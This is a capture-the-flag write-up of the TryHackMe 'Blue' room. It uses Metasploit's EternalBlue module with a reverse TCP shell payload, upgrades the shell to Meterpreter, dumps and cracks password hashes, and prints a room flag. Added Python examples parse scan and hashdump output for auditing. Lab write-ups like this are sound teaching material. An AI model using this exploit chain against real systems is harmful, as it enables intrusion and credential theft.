THM Blue Write Up

Rithvik Reddy
4 min read · Aug 5, 2021

Background - Blue is a great machine to get familiar with EternalBlue (CVE-2017-0144).

The room's description says that the machine doesn't respond to ICMP ping packets, but if we try to ping it, it works and we get a reply back. Since it's a Windows box, weird things happen.

Reconnaissance

Let's follow the traditional method and scan the machine.

Type this command:

nmap -sV -sC -A <machine-ip>

What does this command do?

  • -sV : Enumerates service versions on the open ports.
  • -sC : Performs a script scan using the default set of scripts. It is equivalent to --script=default.
  • -A : Enables OS detection, version detection and script scanning in one flag.

We got this

OK, we saw that there are 3 open ports with a port number under 1000.
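As an added example (not part of the original write-up), here is a small Python parser for nmap's grepable output (-oG), the format the scan above can also be saved in. It lists the open ports below 1000 and flags hosts with 445/tcp open, which is the SMB port the MS17-010 vulnerability is reached through; a defender would run this kind of check across a whole scan file to inventory exposed hosts before patching. The host address and port list in SAMPLE_GNMAP are constructed, not real scan output.

```python
import re
from dataclasses import dataclass

# Constructed sample: one host line in nmap grepable (-oG) output, modelled on
# a Windows host with three ports open below 1000 plus RDP. Not a real scan.
SAMPLE_GNMAP = (
    "Host: 10.10.10.10 ()\tPorts: 135/open/tcp//msrpc///, "
    "139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, "
    "3389/open/tcp//ms-wbt-server///\tIgnored State: closed (996)\n"
)

# Each entry in the Ports field has seven slash-separated fields:
# port/state/protocol/owner/service/rpc-info/version
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


@dataclass
class OpenPort:
    number: int
    protocol: str
    service: str


def parse_gnmap(text):
    """Return {host: [OpenPort, ...]} for every host line that has a Ports field."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the next tab-separated field.
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        hosts[host] = [
            OpenPort(int(num), proto, svc)
            for num, state, proto, _owner, svc, _rpc, _ver in PORT_RE.findall(ports_field)
            if state == "open"
        ]
    return hosts


def ports_below(ports, limit=1000):
    """Open port numbers below the given limit (the write-up counts those under 1000)."""
    return [p.number for p in ports if p.number < limit]


def smb_exposed(ports):
    """True when 445/tcp is open: the SMB service that MS17-010 affects."""
    return any(p.number == 445 and p.protocol == "tcp" for p in ports)


if __name__ == "__main__":
    for host, ports in parse_gnmap(SAMPLE_GNMAP).items():
        print(host, "open <1000:", ports_below(ports), "SMB exposed:", smb_exposed(ports))
```

Pointing parse_gnmap at a real scan file (for example the output of nmap -oG scan.gnmap ...) gives a per-host table that makes it obvious which machines still have SMB reachable.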

What is the machine vulnerable to?

Hint:

After googling I found this; it is ms17_010_eternalblue.

Access

To gain access to the machine we run Metasploit. To start Metasploit, type

msfconsole

The exploit module which we will run against the machine is exploit/windows/smb/ms17_010_eternalblue.

Now we will use this exploit by entering the command

use exploit/windows/smb/ms17_010_eternalblue

and type show options to see the required values.

RHOSTS is the required option.

Now let's exploit the machine; for this we just need to set the payload, RHOSTS and LHOST.

Type

set payload windows/x64/shell/reverse_tcp
set RHOSTS <machine-ip>
set LHOST <your-ip>

OK, now we are good to go. Just type exploit or run to exploit the machine.

Yay, we successfully exploited the machine.

Escalate

Let's start escalating privileges. For this, background the current session with Ctrl+Z, then convert the plain shell to a Meterpreter shell in Metasploit.

Type

use post/multi/manage/shell_to_meterpreter
show options

Now we can see that SESSION is the required option to set. For this, type sessions -l to list the open sessions.

Now we need to set the session id and exploit. For this just type

set SESSION 1

and run it. Now we have successfully completed the post module execution.

Cracking

Within our elevated Meterpreter shell, run the command 'hashdump'. This will dump all of the password hashes on the machine, as long as we have the correct privileges to do so.

hashdump

The name of the non-default user is Jon.
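As an added example (not part of the original write-up), here is Python that parses the pwdump-style lines hashdump prints (user:RID:LM-hash:NT-hash:::) and answers the question above programmatically: built-in accounts have RIDs below 1000, so the non-default user is the one at RID 1000 or above. It also reports the two things a defender auditing such a dump cares about most: accounts whose NT hash is the well-known empty-password value, and accounts that still have an LM hash stored. The sample lines are constructed and the non-empty hashes are placeholders, not the values from the room.

```python
import re
from dataclasses import dataclass

# Well-known hash values of an empty password; an account showing these has no password set.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Built-in accounts (Administrator=500, Guest=501, ...) have RIDs below 1000;
# locally created users are numbered from 1000 upwards.
BUILTIN_RID_LIMIT = 1000

# Constructed sample in the format hashdump prints: user:RID:LM:NT:::
# The non-empty NT hashes are placeholders, not real values from the machine.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


@dataclass
class Account:
    name: str
    rid: int
    lm_hash: str
    nt_hash: str

    @property
    def builtin(self):
        return self.rid < BUILTIN_RID_LIMIT

    @property
    def blank_password(self):
        return self.nt_hash.lower() == EMPTY_NT

    @property
    def lm_stored(self):
        # Anything other than the empty LM value means the weak LM format is being kept.
        return self.lm_hash.lower() != EMPTY_LM


def parse_hashdump(text):
    """Parse hashdump output into Account records, skipping lines that don't match."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            name, rid, lm, nt = m.groups()
            accounts.append(Account(name, int(rid), lm, nt))
    return accounts


def non_default_users(accounts):
    """Names of accounts that are not built-in (RID >= 1000)."""
    return [a.name for a in accounts if not a.builtin]


def audit_findings(accounts):
    """Findings a defender would act on after reviewing the dump."""
    findings = []
    for a in accounts:
        if a.blank_password:
            findings.append(f"{a.name} (RID {a.rid}) has a blank password")
        if a.lm_stored:
            findings.append(f"{a.name} (RID {a.rid}) still has an LM hash stored")
    return findings


if __name__ == "__main__":
    accounts = parse_hashdump(SAMPLE_HASHDUMP)
    print("non-default users:", non_default_users(accounts))
    for finding in audit_findings(accounts):
        print("finding:", finding)
```

On the sample, non_default_users returns ["Jon"] and the only finding is the blank-password Guest account (which Windows disables by default, so that finding is informational unless the account has been enabled).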

Now copy this hash and crack it online.

Yay, we got credentials.

Here comes the main part {FLAGS}

For the flags, just type shell in Meterpreter.

Now you should search for the flags. For this, just change your directory to C:\ and then type this command to search for the files containing the flags.

dir *flag*.txt /s

Yay, we found the flags; now just cat the file.

15ae4d7b4081407aa462768c5056c6e0

Thanks for scrolling down.

Rithvik Reddy.
